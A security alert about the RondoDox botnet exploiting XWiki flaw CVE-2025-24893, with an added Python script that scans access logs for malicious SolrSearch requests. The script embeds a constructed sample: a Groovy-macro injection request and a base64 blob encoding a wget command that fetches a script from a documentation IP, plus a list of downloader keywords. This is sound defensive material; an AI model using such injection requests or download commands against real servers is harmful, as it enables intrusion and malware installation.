Security Alert! “RondoDox” Botnet Targets XWiki Servers via Critical CVE-2025-24893 Vulnerability


477/68 Thursday, November 20, 2025

Cybersecurity experts are closely monitoring the rapid spread of RondoDox, a large-scale botnet now exploiting a critical vulnerability in the XWiki platform. The flaw, tracked as CVE-2025-24893, is a Remote Code Execution (RCE) vulnerability that allows attackers to execute arbitrary malicious code on vulnerable systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has already confirmed that this vulnerability has been actively exploited since October 30. Recent findings from VulnCheck further indicate that multiple threat actors, not just RondoDox, are now abusing this flaw, including groups deploying cryptocurrency-mining malware.

According to VulnCheck’s analysis, RondoDox began exploiting the vulnerability on November 3, using HTTP GET requests to inject base64-encoded Groovy code through the XWiki SolrSearch component. This technique forces the targeted server to download and execute a malicious script (rondo.<value>.sh), which acts as a first-stage downloader. The script then retrieves and installs the main RondoDox payload. Researchers also observed additional attack patterns, including attempts to deploy Bash reverse shells and widespread automated scanning using tools like Nuclei to identify other vulnerable systems at scale.

XWiki Platform, an open-source Java-based system commonly used for internal knowledge management in organizations, is particularly at risk, especially in versions prior to 15.10.11 and 16.4.1. Security experts strongly urge administrators to apply the latest patches immediately, given the urgency of the situation: attackers began weaponizing the vulnerability just days after the first reported exploitation. Administrators are also encouraged to implement security controls using the published Indicators of Compromise (IoCs), which can help block malicious traffic, including requests from known RondoDox-associated servers and suspicious user-agent strings.
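As an added illustration of the detection side of the two paragraphs above (this is not code from the source article, from VulnCheck or from the XWiki project), the following Python script scans web-server access-log lines for SolrSearch requests that carry a Groovy macro or a base64 blob decoding to downloader-style text. It assumes Combined Log Format and XWiki's default SolrSearch path; the log lines, IP addresses and base64 payload are constructed samples.

```python
import base64
import re
from urllib.parse import unquote

# Assumption: the search page is reachable at a path ending in /SolrSearch
# (XWiki's default is /xwiki/bin/get/Main/SolrSearch); adjust for your deployment.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
SOLRSEARCH = re.compile(r"/SolrSearch(?:[/?]|$)", re.IGNORECASE)
GROOVY_MACRO = re.compile(r"\{\{\s*groovy", re.IGNORECASE)   # wiki-syntax script macro
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Strings a decoded first-stage downloader tends to contain; "rondo." and ".sh"
# follow the script naming reported for RondoDox, the rest are generic fetch/exec verbs.
DECODED_MARKERS = ("rondo.", ".sh", "wget ", "curl ", "/bin/sh", "chmod ")

def _fully_decoded(url: str) -> str:
    """Undo repeated URL-encoding so layered obfuscation is inspected in clear text."""
    prev, cur = None, url
    while prev != cur:
        prev, cur = cur, unquote(cur)
    return cur

def assess(line: str):
    """Return (ip, user_agent, reasons) for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = _fully_decoded(m["url"])
    path, _, query = url.partition("?")
    if not SOLRSEARCH.search(path):
        return None
    reasons = []
    if GROOVY_MACRO.search(query):
        reasons.append("groovy macro in SolrSearch query")
    for blob in B64_BLOB.findall(query):
        try:  # pad to a multiple of 4 in case the sender stripped the '=' padding
            text = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        hits = [k for k in DECODED_MARKERS if k in text]
        if hits:
            reasons.append("base64 payload decodes to downloader text: " + ", ".join(hits))
            break
    return (m["ip"], m["ua"], reasons) if reasons else None

def scan(lines):
    """Return the suspicious entries from an iterable of access-log lines."""
    return [r for r in map(assess, lines) if r]

# Constructed sample: one ordinary search, one request embedding a Groovy macro and a
# base64 blob (RFC 5737 documentation addresses; the blob is not a working exploit).
_CONSTRUCTED_BLOB = base64.b64encode(b"wget -O /tmp/rondo.sh http://203.0.113.5/rondo.x.sh").decode()
SAMPLE_LOGS = [
    '203.0.113.9 - - [03/Nov/2025:10:14:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=onboarding+guide HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [03/Nov/2025:10:15:31 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bgroovy%7D%7D' + _CONSTRUCTED_BLOB + '%7B%7B/groovy%7D%7D HTTP/1.1" 200 611 "-" "Mozilla/5.0 (constructed-bot)"',
]
```

Feeding a real access log through `scan()` yields the source IPs and user-agent strings to compare against the published IoCs and to feed into blocking rules.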

Source: https://www.bleepingcomputer.com/news/security/rondodox-botnet-malware-now-hacks-servers-using-xwiki-flaw/